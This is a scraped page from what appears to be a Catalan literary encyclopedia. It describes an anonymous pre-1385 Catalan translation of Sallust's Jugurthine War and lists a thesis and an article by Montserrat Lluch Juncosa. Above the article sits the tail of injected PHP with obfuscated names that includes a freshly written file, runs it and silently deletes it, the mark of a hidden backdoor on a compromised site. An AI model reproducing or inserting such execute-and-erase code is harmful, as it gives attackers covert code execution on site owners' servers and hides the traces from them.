");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> La guerra de Jugurta
Facebook Twitter
La guerra de Jugurta de Sal·lusti(s. xiv).La traducció anònima del Bellum Iughurtinum de Sal·lusti, anterior a 1385, s’ha conservat en un manuscrit relacionat amb les compilacions historiogràfiques aragoneses de Juan Fernández de Heredia, i fou executada amb vistes al seu ús en la redacció de la Gran Crònica d’Espanya. La peculiaritat més vistent de la versió és una literalitat extrema que en dificulta la intel·ligibilitat. [Josep Pujol]
LLUCH JUNCOSA, Montserrat. ElJugurta català del segle XIV. Barcelona: UB, 2003. Tesi doctoral.
LLUCH JUNCOSA, Montserrat. “Editar el Jugurta català del segle XIV: un plantejament metodològic”. Cultura Neolatina 54 (2004), p. 559-593.
Amb el suport de: